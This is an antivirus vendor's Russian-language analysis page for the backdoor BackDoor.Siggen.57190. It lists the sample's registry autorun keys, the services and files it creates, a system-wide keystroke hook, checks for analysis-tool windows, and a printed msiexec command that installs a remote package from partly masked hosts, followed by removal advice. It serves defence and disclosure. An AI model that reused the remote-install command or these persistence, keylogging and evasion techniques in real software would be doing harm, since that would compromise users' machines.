Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

BackDoor.Siggen.57190

Добавлен в вирусную базу Dr.Web: 2014-06-21

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
  • [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'ufuej' = '%PROGRAM_FILES%\gjwymtzdgtvj\impces.exe jn'
  • [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'ufuej' = '%PROGRAM_FILES%\gjwymtzdgtvj\impces.exe jn'
Создает следующие сервисы:
  • [<HKLM>\SYSTEM\ControlSet001\Services\uugtpgfkxnsyln] 'Start' = '00000002'
  • [<HKLM>\SYSTEM\ControlSet001\Services\BITS] 'Start' = '00000002'
Вредоносные функции:
Создает и запускает на исполнение:
  • '%TEMP%\lygzm9.exe'
  • 'C:\Users\setup (3).exe'
  • '%PROGRAM_FILES%\Gjwymtzdgtvj\impces.exe'
Запускает на исполнение:
  • '<SYSTEM32>\msiexec.exe' /i "http://pl####.cdnpckgs.eu/client/pkgs/springbok2/Springbok Casino20140613024413.msi" DDC_DID=119040 DDC_RTGURL=http://www.dl##ile.eu/dl/TrackSetup/TrackSetup.aspx?DI######## DDC_UPDATESTATUSURL=http://19#.#.88.169:8080/springbok/Lobby.WebServices/Installer.asmx SETUPEXEDIR="%HOMEPATH%\Local Settings\Temp" SETUPEXENAME="lygzm9.exe"
Устанавливает процедуры перхвата сообщений
о нажатии клавиш клавиатуры:
  • Библиотека-обработчик для всех процессов: <SYSTEM32>\ms4unкern.dll
Ищет следующие окна с целью
обнаружения утилит для анализа:
  • ClassName: 'PROCMON_WINDOW_CLASS' WindowName: '(null)'
  • ClassName: 'RegMonClass' WindowName: '(null)'
  • ClassName: 'FileMonClass' WindowName: '(null)'
Изменения в файловой системе:
Создает следующие файлы:
  • %TEMP%\{0A57DEE8-8C74-4320-B9AF-460D03F82238}\Setup.INI
  • %TEMP%\_is1.tmp
  • %TEMP%\_is2.tmp
  • %TEMP%\{0A57DEE8-8C74-4320-B9AF-460D03F82238}\_ISMSIDEL.INI
  • C:\Users\setup (3).exe
  • <SYSTEM32>\RICHTX32.OCX
  • %TEMP%\lygzm9.exe
  • C:\Users\imp.lnk
  • %ALLUSERSPROFILE%\Application Data\TEMP:8927A071
  • %TEMP%\~5.tmp
  • %WINDIR%\Installer\MSI7.tmp
  • <SYSTEM32>\dxsqrgwl.dat
  • %TEMP%\_is4.tmp
  • %TEMP%\{0A57DEE8-8C74-4320-B9AF-460D03F82238}\0x0409.ini
  • %TEMP%\_is6.tmp
  • %TEMP%\~3.tmp
  • %PROGRAM_FILES%\Gjwymtzdgtvj\unins000.dat
  • %PROGRAM_FILES%\Gjwymtzdgtvj\Log\Visual\06212014.dat
  • <SYSTEM32>\erxgf.dat
  • %PROGRAM_FILES%\Gjwymtzdgtvj\unins000.exe
  • %TEMP%\$inst\temp_0.tmp
  • %TEMP%\$inst\2.tmp
  • %PROGRAM_FILES%\Gjwymtzdgtvj\Log\Text\aiotxt.dat
  • %PROGRAM_FILES%\Gjwymtzdgtvj\impces.exe
  • <SYSTEM32>\MSSTDFMT.DLL
  • <SYSTEM32>\MSCOMCTL.OCX
  • <SYSTEM32>\mswнnпore.dll
  • <SYSTEM32>\MSWINSCK.OCX
  • <SYSTEM32>\impcesq.exe
  • <SYSTEM32>\IJL_11.DLL
  • <SYSTEM32>\ms4unКern.dll
  • <SYSTEM32>\MpSigStub.exe
Удаляет следующие файлы:
  • %TEMP%\_is6.tmp
  • %TEMP%\~3.tmp
  • %WINDIR%\Installer\MSI7.tmp
  • %TEMP%\~5.tmp
  • %TEMP%\_is4.tmp
  • %TEMP%\$inst\2.tmp
  • %TEMP%\$inst\temp_0.tmp
  • %TEMP%\_is2.tmp
  • %TEMP%\_is1.tmp
Сетевая активность:
Подключается к:
  • 'pl####.cdnpckgs.eu':80
  • 'wp#d':80
TCP:
Запросы HTTP GET:
  • pl####.cdnpckgs.eu/client/pkgs/springbok2/Springbok%20Casino20140613024413.msi
  • wp#d/wpad.dat
UDP:
  • DNS ASK pl####.cdnpckgs.eu
  • DNS ASK wp#d
Другое:
Ищет следующие окна:
  • ClassName: 'Indicator' WindowName: '(null)'
  • ClassName: '(null)' WindowName: '(null)'
  • ClassName: 'Shell_TrayWnd' WindowName: '(null)'

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке